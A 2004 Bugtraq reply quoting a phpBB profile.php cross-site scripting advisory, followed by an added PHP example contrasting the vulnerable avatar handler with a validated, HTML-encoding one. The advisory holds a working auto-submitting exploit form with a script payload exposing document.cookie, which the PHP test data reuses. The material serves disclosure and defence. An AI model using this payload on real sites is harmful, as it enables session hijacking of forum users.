RE: Fw: phpBB profile.php Cross Site Scripting Vulnerability
I'm going to say this again. Please contact security@ before posting here,
and give them an appropriate amount of time to reply. This goes for _any_
software company. Thank you.
----- Original Message -----
From: "Cheng Peng Su" <apple_soup@xxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Sent: Saturday, March 20, 2004 10:36 PM
Subject: phpBB profile.php Cross Site Scripting Vulnerability
|
|
|
| #####################################################################
|
| Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
| Release Date : Mar 21, 2004
| Application : phpBB
| Version : phpBB 2.0.6d or others?
| Platform : PHP
| Vendor URL : http://www.phpbb.com/
| Author : Cheng Peng Su(apple_soup_at_msn.com)
|
| #####################################################################
|
| Proof of Concept:
|
| This vuln is in profile.php. When you click [Show Gallery], phpBB
| will show you the Avatar gallery, asking you to choose one for yourself.
| The hole is in the form: after submitting, phpBB will use the value of
| "avatarselect" as the path of the gallery directly, without filtering
| any illegal characters.
|
| Exploit:
|
| -------------exploit.htm--------------
| <form name='f' action="http://site/profile.php?mode=editprofile" method="post">
| <input name="avatarselect" value='"><script>alert(document.cookie)</script>'>
| <input type="submit" name="submitavatar" value="Select avatar">
| </form>
| <script>
| window.onload=function()
| {
| document.all.submitavatar.click();
| }
| </script>
| ---------------end-------------------
|
| Contact:
|
| Cheng Peng Su
| Class 1, Senior 2, High school attached to Wuhan University
| Wuhan, Hubei, China (430072)
| apple_soup_at_msn.com
|
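The quoted advisory describes the defect as a form value ("avatarselect") that is used as a gallery path and echoed back into the page without filtering. The following PHP is an added example, not phpBB's code and not from either poster, showing that unsafe pattern next to a hardened handler that validates the value against an allow-list of real gallery entries and HTML-encodes it on output. The gallery root constant, the function names, and the sample allow-list are assumptions made for this example.

```php
<?php
// Added example (not phpBB's own code): validating and encoding an
// avatar selection before it is used as a path or echoed into HTML.

declare(strict_types=1);

// Hypothetical gallery root; phpBB's real directory layout is not assumed.
const AVATAR_GALLERY_ROOT = '/images/avatars/gallery';

/**
 * The unsafe pattern the advisory describes: the submitted value goes
 * straight into a path and into an HTML attribute with no filtering, so a
 * value containing quotes and a <script> tag is reflected verbatim.
 */
function vulnerable_avatar_html(string $avatarselect): string
{
    return '<img src="' . AVATAR_GALLERY_ROOT . '/' . $avatarselect . '">';
}

/**
 * Hardened handler. Returns the safe <img> tag, or null when the value is
 * rejected. $allowed is the list of gallery entries that actually exist
 * (in a real deployment, built server-side from the gallery directory).
 */
function safe_avatar_html(string $avatarselect, array $allowed): ?string
{
    // 1. Structural check: a gallery entry is "subdir/file.ext" drawn from a
    //    tight character set. This rejects quotes, angle brackets, "..",
    //    leading slashes and anything else that is not a plain file name.
    if (!preg_match('#^[A-Za-z0-9_-]+/[A-Za-z0-9_-]+\.(gif|jpe?g|png)$#', $avatarselect)) {
        return null;
    }

    // 2. Allow-list check: the value must name a known gallery file, so the
    //    client never chooses an arbitrary path even if it passes step 1.
    if (!in_array($avatarselect, $allowed, true)) {
        return null;
    }

    // 3. Output encoding: even an accepted value is escaped before it is
    //    placed inside an HTML attribute.
    $escaped = htmlspecialchars($avatarselect, ENT_QUOTES, 'UTF-8');
    return '<img src="' . AVATAR_GALLERY_ROOT . '/' . $escaped . '">';
}

// Constructed sample data for the demonstration.
$allowed = ['animals/cat.gif', 'animals/dog.png'];
$reflected = '"><script>alert(document.cookie)</script>';   // the advisory's PoC value

echo vulnerable_avatar_html($reflected), PHP_EOL;             // script tag reflected into the page
var_dump(safe_avatar_html('animals/cat.gif', $allowed));      // string(...) safe <img> tag
var_dump(safe_avatar_html($reflected, $allowed));             // NULL: rejected at step 1
var_dump(safe_avatar_html('../../config.php', $allowed));     // NULL: rejected at step 1
var_dump(safe_avatar_html('animals/bird.gif', $allowed));     // NULL: rejected at step 2
```

The three checks are deliberately layered: the regular expression alone would stop the markup in the PoC, but only the allow-list ties the value to files the server actually intends to expose, and only the output encoding protects the page if a future code path loosens the first two checks.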